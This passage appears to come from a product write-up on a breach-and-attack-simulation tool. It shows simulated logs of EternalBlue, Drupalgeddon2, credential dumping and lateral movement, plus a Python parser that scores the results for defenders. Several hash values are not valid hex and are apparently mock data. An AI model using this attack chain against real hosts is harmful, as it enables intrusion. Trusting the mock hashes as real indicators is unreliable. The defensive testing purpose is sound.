  [20/Nov/2018] [SYSTEMINFO]: Installed memory (RAM): 12.0 GB
  [20/Nov/2018] [SYSTEMINFO]: System type: 64-bit Operating System, x64-based processor
  [20/Nov/2018] [SYSTEMINFO]: Locale: EN-US
  [20/Nov/2018] [SYSTEMINFO]: Computer name: THINKPAD-111991-M710
  [20/Nov/2018] [SYSTEMINFO]: Full computer name: T-111991-M710.corp.domain.com
  [20/Nov/2018] [SYSTEMINFO]: Domain: corp.domain.com
  [20/Nov/2018] [SYSTEMINFO]: Anti Virus installed: Yes
  [20/Nov/2018] [SYSTEMINFO]: Anti Virus detected: Symantec Endpoint Protection Small Business Edition 3.00.
  [20/Nov/2018] [STATUS]: T1018: Found 3 neighbors using discovery module
  [20/Nov/2018] [INSECURECONFIG]: Found SMB v1 enabled on 192.168.1.101
  [20/Nov/2018] [STATUS]: Testing for T1210: Exploitation of Remote Services
  [20/Nov/2018] [EXPLOITSUGGESTER]: Launching ETERNALBLUE module against 192.168.1.101
  [20/Nov/2018] [T1210][INFORMATION]: Module ETERNALBLUE in progress
  [20/Nov/2018] [EXPLOIT]: Sent 308B shellcode
  [20/Nov/2018] [EXPLOIT]: Module ETERNALBLUE successful.
  [20/Nov/2018] [LATERALMOVEMENT]: Pivoting from 192.168.1.100 to 192.168.1.101 via Module ETERNALBLUE
  [20/Nov/2018] [EXPLOIT]: QAttack agent copy sent to 192.168.1.101
  [20/Nov/2018] [INFORMATION]: QAttack agent information: sdfwe3223d.exe (SHA1: e41a48094c1f21fef892f27b8b6a7ed2bbf0c29g)
  [20/Nov/2018] 13:55:10 PM [STATUS]: All tests complete.

  (agent #1) >>>
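The credential-reuse and Drupalgeddon2 transcripts above are what a blue team actually receives from a BAS run, and the dashboard's "failing techniques" and "tactics overview" are derived from exactly this kind of output. The Python below is an added example, not Qualys code: it parses the `[date] time [TAG][LEVEL]: message` lines into an ATT&CK scoreboard (which techniques succeeded, grouped by tactic) and a list of the files the agent dropped or cleaned up, so the host can be swept for anything left behind. The technique-to-tactic table is a hand-picked subset of MITRE ATT&CK (2018-era Enterprise IDs), the "success" keywords are an assumption about the agent's wording, and the sample log is constructed from lines modelled on both transcripts (the T1191 failure line is invented to show a passing control).

```python
"""QAttack-style BAS transcript -> ATT&CK scoreboard and artifact list.

Added example, not Qualys code. Line shape and tags follow the transcripts above;
the tactic table is a subset of MITRE ATT&CK and the keyword heuristics are assumptions.
"""
import re
from collections import defaultdict

LINE_RE = re.compile(
    r"^\[(?P<date>[^\]]+)\]\s+(?P<time>[\d:-]+\s*[AP]M)\s+"
    r"\[(?P<tag>[^\]]+)\](?:\s*\[(?P<level>[^\]]+)\])?\s*:?\s*(?P<msg>.*)$"
)
TESTING_RE = re.compile(r"Testing for (?:\d+ of \d+ technique\(s\) - )?(T\d{4}):\s*(.+)")
ARTIFACT_RE = re.compile(r"(Dropped|Deleted) file:?\s+(\S+)\s+\(SHA1:\s*([0-9A-Za-z]+)\)")

# Tags under which the agent reports work for the technique announced by the last STATUS line.
UNTAGGED_TECHNIQUE_WORK = {"EXPLOIT", "EXPLOITSUGGESTER", "LATERALMOVEMENT", "SHARE-SCAN"}
# Assumption: any of these words in a technique line means the attack step worked (control failed).
SUCCESS_WORDS = ("successful", "detected", "exploited")

TACTIC = {  # ATT&CK subset; T1078 is listed under several tactics, Defense Evasion chosen here
    "T1003": "Credential Access", "T1018": "Discovery", "T1035": "Execution",
    "T1077": "Lateral Movement", "T1078": "Defense Evasion", "T1173": "Execution",
    "T1190": "Initial Access", "T1191": "Execution", "T1210": "Lateral Movement",
}


def _entry(name):
    return {"name": name, "result": "PASS", "evidence": []}


def parse(log_text):
    """Return (techniques, artifacts).
    techniques: {tid: {"name", "result" ("FAIL" = attack step succeeded), "evidence"}}
    artifacts:  [(kind, filename, sha1)] for files the agent dropped or deleted."""
    techniques, artifacts, current = {}, [], None
    for raw in log_text.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue
        tag, msg = m["tag"].strip(), m["msg"].strip()
        art = ARTIFACT_RE.search(msg)
        if art:
            artifacts.append((art.group(1).lower(), art.group(2), art.group(3).lower()))
        if tag == "STATUS":
            t = TESTING_RE.search(msg)
            if t:                                   # a new technique test begins
                current = t.group(1)
                e = techniques.setdefault(current, _entry(t.group(2)))
                e["name"] = e["name"] or t.group(2)
            continue
        tid = tag if re.fullmatch(r"T\d{4}", tag) else (current if tag in UNTAGGED_TECHNIQUE_WORK else None)
        if tid is None:
            continue
        e = techniques.setdefault(tid, _entry(None))
        e["evidence"].append(msg)
        if any(w in msg.lower() for w in SUCCESS_WORDS):
            e["result"] = "FAIL"
    return techniques, artifacts


def failing_by_tactic(techniques):
    """The dashboard's 'tactics overview by failing techniques'."""
    out = defaultdict(list)
    for tid, e in techniques.items():
        if e["result"] == "FAIL":
            out[TACTIC.get(tid, "Unmapped")].append(tid)
    return {k: sorted(v) for k, v in out.items()}


def leftover_files(artifacts):
    """Files the agent reported dropping but never reported deleting: sweep these."""
    deleted = {name for kind, name, _ in artifacts if kind == "deleted"}
    return sorted({name for kind, name, _ in artifacts if kind == "dropped"} - deleted)


# Constructed sample modelled on the two transcripts above (the T1191 line is invented).
SAMPLE_LOG = """\
[20/Nov/2018] 13:54:50 PM [STATUS]: Testing for 1 of 3 technique(s) - T1190: Exploit Public-Facing Application
[20/Nov/2018] 13:54:51 PM [T1190][INFORMATION]: Successfully exploited using Drupalgeddon2 exploit - CVE-2018-7600
[20/Nov/2018] 13:54:52 PM [T1190][INFORMATION]: Dropped file: sda32fds.exe (SHA1: f47a48094c1f21fef892f27b8b6a7ed2bbf0c29g)
[20/Nov/2018] 13:55:01 PM [STATUS]: Testing for T1210: Exploitation of Remote Services
[20/Nov/2018] 13:55:02 PM [EXPLOITSUGGESTER]: Launching ETERNALBLUE module against 192.168.1.101
[20/Nov/2018] 13:55:05 PM [EXPLOIT]: Module ETERNALBLUE successful.
[20/Nov/2018] 13:58:32 PM [CLEANUP]: Deleted file mimikatz.exe (SHA1: d40a48094c1f21fef892f27a8b6a7ed2bb0c27f)
[20/Nov/2018] 13:58:34 PM [T1003][INFORMATION]: Test successful
[20/Nov/2018] 14:32:29 PM [STATUS]: Testing for T1077: Windows Admin Share
[20/Nov/2018] 14:32:30 PM [T1077][INFORMATION]: Windows admin$ share detected on 192.168.1.101
[20/Nov/2018] 14:32:37 PM [STATUS]: Testing for T1035: Service Execution
[20/Nov/2018] 14:32:39 PM [T1035][INFORMATION]: Test successful.
[20/Nov/2018] 14:32:39 PM [CLEANUP]: Deleted file psexec.exe (SHA1: e50d9e3bd91908e13a26b3e23edeaf577fb3a095)
[20/Nov/2018] 14:32:40 PM [STATUS]: Testing for T1191: CMSTP
[20/Nov/2018] 14:32:41 PM [T1191][INFORMATION]: Test failed: cmstp.exe blocked by application control
[20/Nov/2018] 14:32:42 PM [STATUS]: All tests complete.
"""

if __name__ == "__main__":
    techniques, artifacts = parse(SAMPLE_LOG)
    for tid, e in sorted(techniques.items()):
        print(tid, e["result"], e["name"])
    print(failing_by_tactic(techniques))
    print("leftover:", leftover_files(artifacts))
```

Two details matter for real transcripts. The ETERNALBLUE success is logged under `[EXPLOIT]`, not under a technique tag, so the parser attributes untagged exploit lines to the technique announced by the most recent "Testing for" STATUS line; without that, T1210 would be scored as a pass. And `sda32fds.exe` is dropped on the Drupal host but never appears in a CLEANUP line, so `leftover_files` flags it; a BAS run that leaves its own implant behind is a finding in its own right, and the SHA1 values are also what to search EDR telemetry for to check whether the drops were seen at all.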


Live View: Drupalgeddon2

[Screenshot: live view of the scan "Drupalgeddon2", campaign exploit.vulnerability.drupalgeddon2, status InProgress. Same facets as the Password Reuse view (Tactics, Status, Operating System). Selected node: IP 192.168.1.100, hostname https://corpdomain.tld, username CORP/administrator, processor AMD Threadripper 1980X, privileges administrator; graph edges run to 192.168.1.103, 192.168.1.105, 192.168.1.110 and other hosts.]

Breached: 192.168.1.101 - THINKPAD-98689-M710

  [11/10/2018] 10:01:27 AM [STATUS]: Testing for 1 of 3 technique(s) - T1190: Exploit Public-Facing Application
  [11/10/2018] 10:01:28 AM [T1190][INFORMATION]: Found public facing Drupal web host: https://corpdomain.tld/blog
  [11/10/2018] 10:01:35 AM [T1190][INFORMATION]: Drupal 7.46 detected via https://corpdomain.tld/blog/CHANGELOG.txt
  [11/10/2018] 10:01:43 AM [T1190][INFORMATION]: Successfully exploited using Drupalgeddon2 exploit - CVE-2018-7600
  [11/10/2018] 10:01:51 AM [T1190][INFORMATION]: Dropped file: sda32fds.exe (SHA1: f47a48094c1f21fef892f27b8b6a7ed2bbf0c29g)
  [11/10/2018] 10:01:52 AM [STATUS]: Waiting for connection from sda32fds.exe

Thank you! (Merci, Grazie!)